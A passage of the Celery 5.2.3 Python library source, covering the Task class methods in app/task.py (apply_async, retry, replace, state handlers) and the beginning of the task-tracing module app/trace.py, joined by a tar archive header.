fails or times out. #: #: Configuring this setting only applies to tasks that are #: acknowledged **after** they have been executed and only if #: :setting:`task_acks_late` is enabled. #: #: The application default can be overridden with the #: :setting:`task_acks_on_failure_or_timeout` setting. acks_on_failure_or_timeout = None #: Even if :attr:`acks_late` is enabled, the worker will #: acknowledge tasks when the worker process executing them abruptly #: exits or is signaled (e.g., :sig:`KILL`/:sig:`INT`, etc). #: #: Setting this to true allows the message to be re-queued instead, #: so that the task will execute again by the same worker, or another #: worker. #: #: Warning: Enabling this can cause message loops; make sure you know #: what you're doing. reject_on_worker_lost = None #: Tuple of expected exceptions. #: #: These are errors that are expected in normal operation #: and that shouldn't be regarded as a real error by the worker. #: Currently this means that the state will be updated to an error #: state, but the worker won't log the event as an error. throws = () #: Default task expiry time. expires = None #: Default task priority. priority = None #: Max length of result representation used in logs and events. resultrepr_maxsize = 1024 #: Task request stack, the current request will be the topmost. request_stack = None #: Some may expect a request to exist even if the task hasn't been #: called. This should probably be deprecated. _default_request = None #: Deprecated attribute ``abstract`` here for compatibility. abstract = True _exec_options = None __bound__ = False from_config = ( ('serializer', 'task_serializer'), ('rate_limit', 'task_default_rate_limit'), ('priority', 'task_default_priority'), ('track_started', 'task_track_started'), ('acks_late', 'task_acks_late'), ('acks_on_failure_or_timeout', 'task_acks_on_failure_or_timeout'), ('reject_on_worker_lost', 'task_reject_on_worker_lost'), ('ignore_result', 'task_ignore_result'), ('store_eager_result', 'task_store_eager_result'), ('store_errors_even_if_ignored', 'task_store_errors_even_if_ignored'), ) _backend = None # set by backend property. # - Tasks are lazily bound, so that configuration is not set # - until the task is actually used @classmethod def bind(cls, app): was_bound, cls.__bound__ = cls.__bound__, True cls._app = app conf = app.conf cls._exec_options = None # clear option cache if cls.typing is None: cls.typing = app.strict_typing for attr_name, config_name in cls.from_config: if getattr(cls, attr_name, None) is None: setattr(cls, attr_name, conf[config_name]) # decorate with annotations from config. if not was_bound: cls.annotate() from celery.utils.threads import LocalStack cls.request_stack = LocalStack() # PeriodicTask uses this to add itself to the PeriodicTask schedule. cls.on_bound(app) return app @classmethod def on_bound(cls, app): """Called when the task is bound to an app. Note: This class method can be defined to do additional actions when the task class is bound to an app. """ @classmethod def _get_app(cls): if cls._app is None: cls._app = current_app if not cls.__bound__: # The app property's __set__ method is not called # if Task.app is set (on the class), so must bind on use. cls.bind(cls._app) return cls._app app = class_property(_get_app, bind) @classmethod def annotate(cls): for d in resolve_all_annotations(cls.app.annotations, cls): for key, value in d.items(): if key.startswith('@'): cls.add_around(key[1:], value) else: setattr(cls, key, value) @classmethod def add_around(cls, attr, around): orig = getattr(cls, attr) if getattr(orig, '__wrapped__', None): orig = orig.__wrapped__ meth = around(orig) meth.__wrapped__ = orig setattr(cls, attr, meth) def __call__(self, *args, **kwargs): _task_stack.push(self) self.push_request(args=args, kwargs=kwargs) try: return self.run(*args, **kwargs) finally: self.pop_request() _task_stack.pop() def __reduce__(self): # - tasks are pickled into the name of the task only, and the receiver # - simply grabs it from the local registry. # - in later versions the module of the task is also included, # - and the receiving side tries to import that module so that # - it will work even if the task hasn't been registered. mod = type(self).__module__ mod = mod if mod and mod in sys.modules else None return (_unpickle_task_v2, (self.name, mod), None) def run(self, *args, **kwargs): """The body of the task executed by workers.""" raise NotImplementedError('Tasks must define the run method.') def start_strategy(self, app, consumer, **kwargs): return instantiate(self.Strategy, self, app, consumer, **kwargs) def delay(self, *args, **kwargs): """Star argument version of :meth:`apply_async`. Does not support the extra options enabled by :meth:`apply_async`. Arguments: *args (Any): Positional arguments passed on to the task. **kwargs (Any): Keyword arguments passed on to the task. Returns: celery.result.AsyncResult: Future promise. """ return self.apply_async(args, kwargs) def apply_async(self, args=None, kwargs=None, task_id=None, producer=None, link=None, link_error=None, shadow=None, **options): """Apply tasks asynchronously by sending a message. Arguments: args (Tuple): The positional arguments to pass on to the task. kwargs (Dict): The keyword arguments to pass on to the task. countdown (float): Number of seconds into the future that the task should execute. Defaults to immediate execution. eta (~datetime.datetime): Absolute time and date of when the task should be executed. May not be specified if `countdown` is also supplied. expires (float, ~datetime.datetime): Datetime or seconds in the future for the task should expire. The task won't be executed after the expiration time. shadow (str): Override task name used in logs/monitoring. Default is retrieved from :meth:`shadow_name`. connection (kombu.Connection): Re-use existing broker connection instead of acquiring one from the connection pool. retry (bool): If enabled sending of the task message will be retried in the event of connection loss or failure. Default is taken from the :setting:`task_publish_retry` setting. Note that you need to handle the producer/connection manually for this to work. retry_policy (Mapping): Override the retry policy used. See the :setting:`task_publish_retry_policy` setting. time_limit (int): If set, overrides the default time limit. soft_time_limit (int): If set, overrides the default soft time limit. queue (str, kombu.Queue): The queue to route the task to. This must be a key present in :setting:`task_queues`, or :setting:`task_create_missing_queues` must be enabled. See :ref:`guide-routing` for more information. exchange (str, kombu.Exchange): Named custom exchange to send the task to. Usually not used in combination with the ``queue`` argument. routing_key (str): Custom routing key used to route the task to a worker server. If in combination with a ``queue`` argument only used to specify custom routing keys to topic exchanges. priority (int): The task priority, a number between 0 and 9. Defaults to the :attr:`priority` attribute. serializer (str): Serialization method to use. Can be `pickle`, `json`, `yaml`, `msgpack` or any custom serialization method that's been registered with :mod:`kombu.serialization.registry`. Defaults to the :attr:`serializer` attribute. compression (str): Optional compression method to use. Can be one of ``zlib``, ``bzip2``, or any custom compression methods registered with :func:`kombu.compression.register`. Defaults to the :setting:`task_compression` setting. link (Signature): A single, or a list of tasks signatures to apply if the task returns successfully. link_error (Signature): A single, or a list of task signatures to apply if an error occurs while executing the task. producer (kombu.Producer): custom producer to use when publishing the task. add_to_parent (bool): If set to True (default) and the task is applied while executing another task, then the result will be appended to the parent tasks ``request.children`` attribute. Trailing can also be disabled by default using the :attr:`trail` attribute ignore_result (bool): If set to `False` (default) the result of a task will be stored in the backend. If set to `True` the result will not be stored. This can also be set using the :attr:`ignore_result` in the `app.task` decorator. publisher (kombu.Producer): Deprecated alias to ``producer``. headers (Dict): Message headers to be included in the message. Returns: celery.result.AsyncResult: Promise of future evaluation. Raises: TypeError: If not enough arguments are passed, or too many arguments are passed. Note that signature checks may be disabled by specifying ``@task(typing=False)``. kombu.exceptions.OperationalError: If a connection to the transport cannot be made, or if the connection is lost. Note: Also supports all keyword arguments supported by :meth:`kombu.Producer.publish`. """ if self.typing: try: check_arguments = self.__header__ except AttributeError: # pragma: no cover pass else: check_arguments(*(args or ()), **(kwargs or {})) if self.__v2_compat__: shadow = shadow or self.shadow_name(self(), args, kwargs, options) else: shadow = shadow or self.shadow_name(args, kwargs, options) preopts = self._get_exec_options() options = dict(preopts, **options) if options else preopts options.setdefault('ignore_result', self.ignore_result) if self.priority: options.setdefault('priority', self.priority) app = self._get_app() if app.conf.task_always_eager: with app.producer_or_acquire(producer) as eager_producer: serializer = options.get('serializer') if serializer is None: if eager_producer.serializer: serializer = eager_producer.serializer else: serializer = app.conf.task_serializer body = args, kwargs content_type, content_encoding, data = serialization.dumps( body, serializer, ) args, kwargs = serialization.loads( data, content_type, content_encoding, accept=[content_type] ) with denied_join_result(): return self.apply(args, kwargs, task_id=task_id or uuid(), link=link, link_error=link_error, **options) else: return app.send_task( self.name, args, kwargs, task_id=task_id, producer=producer, link=link, link_error=link_error, result_cls=self.AsyncResult, shadow=shadow, task_type=self, **options ) def shadow_name(self, args, kwargs, options): """Override for custom task name in worker logs/monitoring. Example: .. code-block:: python from celery.utils.imports import qualname def shadow_name(task, args, kwargs, options): return qualname(args[0]) @app.task(shadow_name=shadow_name, serializer='pickle') def apply_function_async(fun, *args, **kwargs): return fun(*args, **kwargs) Arguments: args (Tuple): Task positional arguments. kwargs (Dict): Task keyword arguments. options (Dict): Task execution options. """ def signature_from_request(self, request=None, args=None, kwargs=None, queue=None, **extra_options): request = self.request if request is None else request args = request.args if args is None else args kwargs = request.kwargs if kwargs is None else kwargs options = request.as_execution_options() delivery_info = request.delivery_info or {} priority = delivery_info.get('priority') if priority is not None: options['priority'] = priority if queue: options['queue'] = queue else: exchange = delivery_info.get('exchange') routing_key = delivery_info.get('routing_key') if exchange == '' and routing_key: # sent to anon-exchange options['queue'] = routing_key else: options.update(delivery_info) return self.signature( args, kwargs, options, type=self, **extra_options ) subtask_from_request = signature_from_request # XXX compat def retry(self, args=None, kwargs=None, exc=None, throw=True, eta=None, countdown=None, max_retries=None, **options): """Retry the task, adding it to the back of the queue. Example: >>> from imaginary_twitter_lib import Twitter >>> from proj.celery import app >>> @app.task(bind=True) ... def tweet(self, auth, message): ... twitter = Twitter(oauth=auth) ... try: ... twitter.post_status_update(message) ... except twitter.FailWhale as exc: ... # Retry in 5 minutes. ... self.retry(countdown=60 * 5, exc=exc) Note: Although the task will never return above as `retry` raises an exception to notify the worker, we use `raise` in front of the retry to convey that the rest of the block won't be executed. Arguments: args (Tuple): Positional arguments to retry with. kwargs (Dict): Keyword arguments to retry with. exc (Exception): Custom exception to report when the max retry limit has been exceeded (default: :exc:`~@MaxRetriesExceededError`). If this argument is set and retry is called while an exception was raised (``sys.exc_info()`` is set) it will attempt to re-raise the current exception. If no exception was raised it will raise the ``exc`` argument provided. countdown (float): Time in seconds to delay the retry for. eta (~datetime.datetime): Explicit time and date to run the retry at. max_retries (int): If set, overrides the default retry limit for this execution. Changes to this parameter don't propagate to subsequent task retry attempts. A value of :const:`None`, means "use the default", so if you want infinite retries you'd have to set the :attr:`max_retries` attribute of the task to :const:`None` first. time_limit (int): If set, overrides the default time limit. soft_time_limit (int): If set, overrides the default soft time limit. throw (bool): If this is :const:`False`, don't raise the :exc:`~@Retry` exception, that tells the worker to mark the task as being retried. Note that this means the task will be marked as failed if the task raises an exception, or successful if it returns after the retry call. **options (Any): Extra options to pass on to :meth:`apply_async`. Raises: celery.exceptions.Retry: To tell the worker that the task has been re-sent for retry. This always happens, unless the `throw` keyword argument has been explicitly set to :const:`False`, and is considered normal operation. """ request = self.request retries = request.retries + 1 if max_retries is not None: self.override_max_retries = max_retries max_retries = self.max_retries if max_retries is None else max_retries # Not in worker or emulated by (apply/always_eager), # so just raise the original exception. if request.called_directly: # raises orig stack if PyErr_Occurred, # and augments with exc' if that argument is defined. raise_with_context(exc or Retry('Task can be retried', None)) if not eta and countdown is None: countdown = self.default_retry_delay is_eager = request.is_eager S = self.signature_from_request( request, args, kwargs, countdown=countdown, eta=eta, retries=retries, **options ) if max_retries is not None and retries > max_retries: if exc: # On Py3: will augment any current exception with # the exc' argument provided (raise exc from orig) raise_with_context(exc) raise self.MaxRetriesExceededError( "Can't retry {}[{}] args:{} kwargs:{}".format( self.name, request.id, S.args, S.kwargs ), task_args=S.args, task_kwargs=S.kwargs ) ret = Retry(exc=exc, when=eta or countdown, is_eager=is_eager, sig=S) if is_eager: # if task was executed eagerly using apply(), # then the retry must also be executed eagerly in apply method if throw: raise ret return ret try: S.apply_async() except Exception as exc: raise Reject(exc, requeue=False) if throw: raise ret return ret def apply(self, args=None, kwargs=None, link=None, link_error=None, task_id=None, retries=None, throw=None, logfile=None, loglevel=None, headers=None, **options): """Execute this task locally, by blocking until the task returns. Arguments: args (Tuple): positional arguments passed on to the task. kwargs (Dict): keyword arguments passed on to the task. throw (bool): Re-raise task exceptions. Defaults to the :setting:`task_eager_propagates` setting. Returns: celery.result.EagerResult: pre-evaluated result. """ # trace imports Task, so need to import inline. from celery.app.trace import build_tracer app = self._get_app() args = args or () kwargs = kwargs or {} task_id = task_id or uuid() retries = retries or 0 if throw is None: throw = app.conf.task_eager_propagates # Make sure we get the task instance, not class. task = app._tasks[self.name] request = { 'id': task_id, 'retries': retries, 'is_eager': True, 'logfile': logfile, 'loglevel': loglevel or 0, 'hostname': gethostname(), 'callbacks': maybe_list(link), 'errbacks': maybe_list(link_error), 'headers': headers, 'ignore_result': options.get('ignore_result', False), 'delivery_info': { 'is_eager': True, 'exchange': options.get('exchange'), 'routing_key': options.get('routing_key'), 'priority': options.get('priority'), }, } tb = None tracer = build_tracer( task.name, task, eager=True, propagate=throw, app=self._get_app(), ) ret = tracer(task_id, args, kwargs, request) retval = ret.retval if isinstance(retval, ExceptionInfo): retval, tb = retval.exception, retval.traceback if isinstance(retval, Retry) and retval.sig is not None: return retval.sig.apply(retries=retries + 1) state = states.SUCCESS if ret.info is None else ret.info.state return EagerResult(task_id, retval, state, traceback=tb) def AsyncResult(self, task_id, **kwargs): """Get AsyncResult instance for the specified task. Arguments: task_id (str): Task id to get result for. """ return self._get_app().AsyncResult(task_id, backend=self.backend, task_name=self.name, **kwargs) def signature(self, args=None, *starargs, **starkwargs): """Create signature. Returns: :class:`~celery.signature`: object for this task, wrapping arguments and execution options for a single task invocation. """ starkwargs.setdefault('app', self.app) return signature(self, args, *starargs, **starkwargs) subtask = signature def s(self, *args, **kwargs): """Create signature. Shortcut for ``.s(*a, **k) -> .signature(a, k)``. """ return self.signature(args, kwargs) def si(self, *args, **kwargs): """Create immutable signature. Shortcut for ``.si(*a, **k) -> .signature(a, k, immutable=True)``. """ return self.signature(args, kwargs, immutable=True) def chunks(self, it, n): """Create a :class:`~celery.canvas.chunks` task for this task.""" from celery import chunks return chunks(self.s(), it, n, app=self.app) def map(self, it): """Create a :class:`~celery.canvas.xmap` task from ``it``.""" from celery import xmap return xmap(self.s(), it, app=self.app) def starmap(self, it): """Create a :class:`~celery.canvas.xstarmap` task from ``it``.""" from celery import xstarmap return xstarmap(self.s(), it, app=self.app) def send_event(self, type_, retry=True, retry_policy=None, **fields): """Send monitoring event message. This can be used to add custom event types in :pypi:`Flower` and other monitors. Arguments: type_ (str): Type of event, e.g. ``"task-failed"``. Keyword Arguments: retry (bool): Retry sending the message if the connection is lost. Default is taken from the :setting:`task_publish_retry` setting. retry_policy (Mapping): Retry settings. Default is taken from the :setting:`task_publish_retry_policy` setting. **fields (Any): Map containing information about the event. Must be JSON serializable. """ req = self.request if retry_policy is None: retry_policy = self.app.conf.task_publish_retry_policy with self.app.events.default_dispatcher(hostname=req.hostname) as d: return d.send( type_, uuid=req.id, retry=retry, retry_policy=retry_policy, **fields) def replace(self, sig): """Replace this task, with a new task inheriting the task id. Execution of the host task ends immediately and no subsequent statements will be run. .. versionadded:: 4.0 Arguments: sig (Signature): signature to replace with. Raises: ~@Ignore: This is always raised when called in asynchronous context. It is best to always use ``return self.replace(...)`` to convey to the reader that the task won't continue after being replaced. """ chord = self.request.chord if 'chord' in sig.options: raise ImproperlyConfigured( "A signature replacing a task must not be part of a chord" ) if isinstance(sig, _chain) and not getattr(sig, "tasks", True): raise ImproperlyConfigured("Cannot replace with an empty chain") # Ensure callbacks or errbacks from the replaced signature are retained if isinstance(sig, group): # Groups get uplifted to a chord so that we can link onto the body sig |= self.app.tasks['celery.accumulate'].s(index=0) for callback in maybe_list(self.request.callbacks) or []: sig.link(callback) for errback in maybe_list(self.request.errbacks) or []: sig.link_error(errback) # If the replacement signature is a chain, we need to push callbacks # down to the final task so they run at the right time even if we # proceed to link further tasks from the original request below if isinstance(sig, _chain) and "link" in sig.options: final_task_links = sig.tasks[-1].options.setdefault("link", []) final_task_links.extend(maybe_list(sig.options["link"])) # We need to freeze the replacement signature with the current task's # ID to ensure that we don't disassociate it from the existing task IDs # which would break previously constructed results objects. sig.freeze(self.request.id) # Ensure the important options from the original signature are retained replaced_task_nesting = self.request.get('replaced_task_nesting', 0) + 1 sig.set( chord=chord, group_id=self.request.group, group_index=self.request.group_index, root_id=self.request.root_id, replaced_task_nesting=replaced_task_nesting ) # If the task being replaced is part of a chain, we need to re-create # it with the replacement signature - these subsequent tasks will # retain their original task IDs as well for t in reversed(self.request.chain or []): sig |= signature(t, app=self.app) # Finally, either apply or delay the new signature! if self.request.is_eager: return sig.apply().get() else: sig.delay() raise Ignore('Replaced by new task') def add_to_chord(self, sig, lazy=False): """Add signature to the chord the current task is a member of. .. versionadded:: 4.0 Currently only supported by the Redis result backend. Arguments: sig (Signature): Signature to extend chord with. lazy (bool): If enabled the new task won't actually be called, and ``sig.delay()`` must be called manually. """ if not self.request.chord: raise ValueError('Current task is not member of any chord') sig.set( group_id=self.request.group, group_index=self.request.group_index, chord=self.request.chord, root_id=self.request.root_id, ) result = sig.freeze() self.backend.add_to_chord(self.request.group, result) return sig.delay() if not lazy else sig def update_state(self, task_id=None, state=None, meta=None, **kwargs): """Update task state. Arguments: task_id (str): Id of the task to update. Defaults to the id of the current task. state (str): New state. meta (Dict): State meta-data. """ if task_id is None: task_id = self.request.id self.backend.store_result( task_id, meta, state, request=self.request, **kwargs) def before_start(self, task_id, args, kwargs): """Handler called before the task starts. .. versionadded:: 5.2 Arguments: task_id (str): Unique id of the task to execute. args (Tuple): Original arguments for the task to execute. kwargs (Dict): Original keyword arguments for the task to execute. Returns: None: The return value of this handler is ignored. """ def on_success(self, retval, task_id, args, kwargs): """Success handler. Run by the worker if the task executes successfully. Arguments: retval (Any): The return value of the task. task_id (str): Unique id of the executed task. args (Tuple): Original arguments for the executed task. kwargs (Dict): Original keyword arguments for the executed task. Returns: None: The return value of this handler is ignored. """ def on_retry(self, exc, task_id, args, kwargs, einfo): """Retry handler. This is run by the worker when the task is to be retried. Arguments: exc (Exception): The exception sent to :meth:`retry`. task_id (str): Unique id of the retried task. args (Tuple): Original arguments for the retried task. kwargs (Dict): Original keyword arguments for the retried task. einfo (~billiard.einfo.ExceptionInfo): Exception information. Returns: None: The return value of this handler is ignored. """ def on_failure(self, exc, task_id, args, kwargs, einfo): """Error handler. This is run by the worker when the task fails. Arguments: exc (Exception): The exception raised by the task. task_id (str): Unique id of the failed task. args (Tuple): Original arguments for the task that failed. kwargs (Dict): Original keyword arguments for the task that failed. einfo (~billiard.einfo.ExceptionInfo): Exception information. Returns: None: The return value of this handler is ignored. """ def after_return(self, status, retval, task_id, args, kwargs, einfo): """Handler called after the task returns. Arguments: status (str): Current task state. retval (Any): Task return value/exception. task_id (str): Unique id of the task. args (Tuple): Original arguments for the task. kwargs (Dict): Original keyword arguments for the task. einfo (~billiard.einfo.ExceptionInfo): Exception information. Returns: None: The return value of this handler is ignored. """ def add_trail(self, result): if self.trail: self.request.children.append(result) return result def push_request(self, *args, **kwargs): self.request_stack.push(Context(*args, **kwargs)) def pop_request(self): self.request_stack.pop() def __repr__(self): """``repr(task)``.""" return _reprtask(self, R_INSTANCE) def _get_request(self): """Get current request object.""" req = self.request_stack.top if req is None: # task was not called, but some may still expect a request # to be there, perhaps that should be deprecated. if self._default_request is None: self._default_request = Context() return self._default_request return req request = property(_get_request) def _get_exec_options(self): if self._exec_options is None: self._exec_options = extract_exec_options(self) return self._exec_options @property def backend(self): backend = self._backend if backend is None: return self.app.backend return backend @backend.setter def backend(self, value): self._backend = value @property def __name__(self): return self.__class__.__name__ BaseTask = Task # XXX compat alias ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/trace.py0000664000175000017500000006534500000000000016425 0ustar00asifasif00000000000000"""Trace task execution. This module defines how the task execution is traced: errors are recorded, handlers are applied and so on. """ import logging import os import sys import time from collections import namedtuple from warnings import warn from billiard.einfo import ExceptionInfo from kombu.exceptions import EncodeError from kombu.serialization import loads as loads_message from kombu.serialization import prepare_accept_content from kombu.utils.encoding import safe_repr, safe_str from celery import current_app, group, signals, states from celery._state import _task_stack from celery.app.task import Context from celery.app.task import Task as BaseTask from celery.exceptions import (BackendGetMetaError, Ignore, InvalidTaskError, Reject, Retry) from celery.result import AsyncResult from celery.utils.log import get_logger from celery.utils.nodenames import gethostname from celery.utils.objects import mro_lookup from celery.utils.saferepr import saferepr from celery.utils.serialization import (get_pickleable_etype, get_pickleable_exception, get_pickled_exception) # ## --- # This is the heart of the worker, the inner loop so to speak. # It used to be split up into nice little classes and methods, # but in the end it only resulted in bad performance and horrible tracebacks, # so instead we now use one closure per task class. # pylint: disable=redefined-outer-name # We cache globals and attribute lookups, so disable this warning. # pylint: disable=broad-except # We know what we're doing... __all__ = ( 'TraceInfo', 'build_tracer', 'trace_task', 'setup_worker_optimizations', 'reset_worker_optimizations', ) from celery.worker.state import successful_requests logger = get_logger(__name__) #: Format string used to log task receipt. LOG_RECEIVED = """\ Task %(name)s[%(id)s] received\ """ #: Format string used to log task success. LOG_SUCCESS = """\ Task %(name)s[%(id)s] succeeded in %(runtime)ss: %(return_value)s\ """ #: Format string used to log task failure. LOG_FAILURE = """\ Task %(name)s[%(id)s] %(description)s: %(exc)s\ """ #: Format string used to log task internal error. LOG_INTERNAL_ERROR = """\ Task %(name)s[%(id)s] %(description)s: %(exc)s\ """ #: Format string used to log task ignored. LOG_IGNORED = """\ Task %(name)s[%(id)s] %(description)s\ """ #: Format string used to log task rejected. LOG_REJECTED = """\ Task %(name)s[%(id)s] %(exc)s\ """ #: Format string used to log task retry. LOG_RETRY = """\ Task %(name)s[%(id)s] retry: %(exc)s\ """ log_policy_t = namedtuple( 'log_policy_t', ('format', 'description', 'severity', 'traceback', 'mail'), ) log_policy_reject = log_policy_t(LOG_REJECTED, 'rejected', logging.WARN, 1, 1) log_policy_ignore = log_policy_t(LOG_IGNORED, 'ignored', logging.INFO, 0, 0) log_policy_internal = log_policy_t( LOG_INTERNAL_ERROR, 'INTERNAL ERROR', logging.CRITICAL, 1, 1, ) log_policy_expected = log_policy_t( LOG_FAILURE, 'raised expected', logging.INFO, 0, 0, ) log_policy_unexpected = log_policy_t( LOG_FAILURE, 'raised unexpected', logging.ERROR, 1, 1, ) send_prerun = signals.task_prerun.send send_postrun = signals.task_postrun.send send_success = signals.task_success.send STARTED = states.STARTED SUCCESS = states.SUCCESS IGNORED = states.IGNORED REJECTED = states.REJECTED RETRY = states.RETRY FAILURE = states.FAILURE EXCEPTION_STATES = states.EXCEPTION_STATES IGNORE_STATES = frozenset({IGNORED, RETRY, REJECTED}) #: set by :func:`setup_worker_optimizations` _localized = [] _patched = {} trace_ok_t = namedtuple('trace_ok_t', ('retval', 'info', 'runtime', 'retstr')) def info(fmt, context): """Log 'fmt % context' with severity 'INFO'. 'context' is also passed in extra with key 'data' for custom handlers. """ logger.info(fmt, context, extra={'data': context}) def task_has_custom(task, attr): """Return true if the task overrides ``attr``.""" return mro_lookup(task.__class__, attr, stop={BaseTask, object}, monkey_patched=['celery.app.task']) def get_log_policy(task, einfo, exc): if isinstance(exc, Reject): return log_policy_reject elif isinstance(exc, Ignore): return log_policy_ignore elif einfo.internal: return log_policy_internal else: if task.throws and isinstance(exc, task.throws): return log_policy_expected return log_policy_unexpected def get_task_name(request, default): """Use 'shadow' in request for the task name if applicable.""" # request.shadow could be None or an empty string. # If so, we should use default. return getattr(request, 'shadow', None) or default class TraceInfo: """Information about task execution.""" __slots__ = ('state', 'retval') def __init__(self, state, retval=None): self.state = state self.retval = retval def handle_error_state(self, task, req, eager=False, call_errbacks=True): if task.ignore_result: store_errors = task.store_errors_even_if_ignored elif eager and task.store_eager_result: store_errors = True else: store_errors = not eager return { RETRY: self.handle_retry, FAILURE: self.handle_failure, }[self.state](task, req, store_errors=store_errors, call_errbacks=call_errbacks) def handle_reject(self, task, req, **kwargs): self._log_error(task, req, ExceptionInfo()) def handle_ignore(self, task, req, **kwargs): self._log_error(task, req, ExceptionInfo()) def handle_retry(self, task, req, store_errors=True, **kwargs): """Handle retry exception.""" # the exception raised is the Retry semi-predicate, # and it's exc' attribute is the original exception raised (if any). type_, _, tb = sys.exc_info() try: reason = self.retval einfo = ExceptionInfo((type_, reason, tb)) if store_errors: task.backend.mark_as_retry( req.id, reason.exc, einfo.traceback, request=req, ) task.on_retry(reason.exc, req.id, req.args, req.kwargs, einfo) signals.task_retry.send(sender=task, request=req, reason=reason, einfo=einfo) info(LOG_RETRY, { 'id': req.id, 'name': get_task_name(req, task.name), 'exc': str(reason), }) return einfo finally: del tb def handle_failure(self, task, req, store_errors=True, call_errbacks=True): """Handle exception.""" _, _, tb = sys.exc_info() try: exc = self.retval # make sure we only send pickleable exceptions back to parent. einfo = ExceptionInfo() einfo.exception = get_pickleable_exception(einfo.exception) einfo.type = get_pickleable_etype(einfo.type) task.backend.mark_as_failure( req.id, exc, einfo.traceback, request=req, store_result=store_errors, call_errbacks=call_errbacks, ) task.on_failure(exc, req.id, req.args, req.kwargs, einfo) signals.task_failure.send(sender=task, task_id=req.id, exception=exc, args=req.args, kwargs=req.kwargs, traceback=tb, einfo=einfo) self._log_error(task, req, einfo) return einfo finally: del tb def _log_error(self, task, req, einfo): eobj = einfo.exception = get_pickled_exception(einfo.exception) exception, traceback, exc_info, sargs, skwargs = ( safe_repr(eobj), safe_str(einfo.traceback), einfo.exc_info, safe_repr(req.args), safe_repr(req.kwargs), ) policy = get_log_policy(task, einfo, eobj) context = { 'hostname': req.hostname, 'id': req.id, 'name': get_task_name(req, task.name), 'exc': exception, 'traceback': traceback, 'args': sargs, 'kwargs': skwargs, 'description': policy.description, 'internal': einfo.internal, } logger.log(policy.severity, policy.format.strip(), context, exc_info=exc_info if policy.traceback else None, extra={'data': context}) def traceback_clear(exc=None): # Cleared Tb, but einfo still has a reference to Traceback. # exc cleans up the Traceback at the last moment that can be revealed. tb = None if exc is not None: if hasattr(exc, '__traceback__'): tb = exc.__traceback__ else: _, _, tb = sys.exc_info() else: _, _, tb = sys.exc_info() while tb is not None: try: tb.tb_frame.clear() tb.tb_frame.f_locals except RuntimeError: # Ignore the exception raised if the frame is still executing. pass tb = tb.tb_next def build_tracer(name, task, loader=None, hostname=None, store_errors=True, Info=TraceInfo, eager=False, propagate=False, app=None, monotonic=time.monotonic, trace_ok_t=trace_ok_t, IGNORE_STATES=IGNORE_STATES): """Return a function that traces task execution. Catches all exceptions and updates result backend with the state and result. If the call was successful, it saves the result to the task result backend, and sets the task status to `"SUCCESS"`. If the call raises :exc:`~@Retry`, it extracts the original exception, uses that as the result and sets the task state to `"RETRY"`. If the call results in an exception, it saves the exception as the task result, and sets the task state to `"FAILURE"`. Return a function that takes the following arguments: :param uuid: The id of the task. :param args: List of positional args to pass on to the function. :param kwargs: Keyword arguments mapping to pass on to the function. :keyword request: Request dict. """ # pylint: disable=too-many-statements # If the task doesn't define a custom __call__ method # we optimize it away by simply calling the run method directly, # saving the extra method call and a line less in the stack trace. fun = task if task_has_custom(task, '__call__') else task.run loader = loader or app.loader ignore_result = task.ignore_result track_started = task.track_started track_started = not eager and (task.track_started and not ignore_result) # #6476 if eager and not ignore_result and task.store_eager_result: publish_result = True else: publish_result = not eager and not ignore_result deduplicate_successful_tasks = ((app.conf.task_acks_late or task.acks_late) and app.conf.worker_deduplicate_successful_tasks and app.backend.persistent) hostname = hostname or gethostname() inherit_parent_priority = app.conf.task_inherit_parent_priority loader_task_init = loader.on_task_init loader_cleanup = loader.on_process_cleanup task_before_start = None task_on_success = None task_after_return = None if task_has_custom(task, 'before_start'): task_before_start = task.before_start if task_has_custom(task, 'on_success'): task_on_success = task.on_success if task_has_custom(task, 'after_return'): task_after_return = task.after_return pid = os.getpid() request_stack = task.request_stack push_request = request_stack.push pop_request = request_stack.pop push_task = _task_stack.push pop_task = _task_stack.pop _does_info = logger.isEnabledFor(logging.INFO) resultrepr_maxsize = task.resultrepr_maxsize prerun_receivers = signals.task_prerun.receivers postrun_receivers = signals.task_postrun.receivers success_receivers = signals.task_success.receivers from celery import canvas signature = canvas.maybe_signature # maybe_ does not clone if already def on_error(request, exc, uuid, state=FAILURE, call_errbacks=True): if propagate: raise I = Info(state, exc) R = I.handle_error_state( task, request, eager=eager, call_errbacks=call_errbacks, ) return I, R, I.state, I.retval def trace_task(uuid, args, kwargs, request=None): # R - is the possibly prepared return value. # I - is the Info object. # T - runtime # Rstr - textual representation of return value # retval - is the always unmodified return value. # state - is the resulting task state. # This function is very long because we've unrolled all the calls # for performance reasons, and because the function is so long # we want the main variables (I, and R) to stand out visually from the # the rest of the variables, so breaking PEP8 is worth it ;) R = I = T = Rstr = retval = state = None task_request = None time_start = monotonic() try: try: kwargs.items except AttributeError: raise InvalidTaskError( 'Task keyword arguments is not a mapping') task_request = Context(request or {}, args=args, called_directly=False, kwargs=kwargs) redelivered = (task_request.delivery_info and task_request.delivery_info.get('redelivered', False)) if deduplicate_successful_tasks and redelivered: if task_request.id in successful_requests: return trace_ok_t(R, I, T, Rstr) r = AsyncResult(task_request.id, app=app) try: state = r.state except BackendGetMetaError: pass else: if state == SUCCESS: info(LOG_IGNORED, { 'id': task_request.id, 'name': get_task_name(task_request, name), 'description': 'Task already completed successfully.' }) return trace_ok_t(R, I, T, Rstr) push_task(task) root_id = task_request.root_id or uuid task_priority = task_request.delivery_info.get('priority') if \ inherit_parent_priority else None push_request(task_request) try: # -*- PRE -*- if prerun_receivers: send_prerun(sender=task, task_id=uuid, task=task, args=args, kwargs=kwargs) loader_task_init(uuid, task) if track_started: task.backend.store_result( uuid, {'pid': pid, 'hostname': hostname}, STARTED, request=task_request, ) # -*- TRACE -*- try: if task_before_start: task_before_start(uuid, args, kwargs) R = retval = fun(*args, **kwargs) state = SUCCESS except Reject as exc: I, R = Info(REJECTED, exc), ExceptionInfo(internal=True) state, retval = I.state, I.retval I.handle_reject(task, task_request) traceback_clear(exc) except Ignore as exc: I, R = Info(IGNORED, exc), ExceptionInfo(internal=True) state, retval = I.state, I.retval I.handle_ignore(task, task_request) traceback_clear(exc) except Retry as exc: I, R, state, retval = on_error( task_request, exc, uuid, RETRY, call_errbacks=False) traceback_clear(exc) except Exception as exc: I, R, state, retval = on_error(task_request, exc, uuid) traceback_clear(exc) except BaseException: raise else: try: # callback tasks must be applied before the result is # stored, so that result.children is populated. # groups are called inline and will store trail # separately, so need to call them separately # so that the trail's not added multiple times :( # (Issue #1936) callbacks = task.request.callbacks if callbacks: if len(task.request.callbacks) > 1: sigs, groups = [], [] for sig in callbacks: sig = signature(sig, app=app) if isinstance(sig, 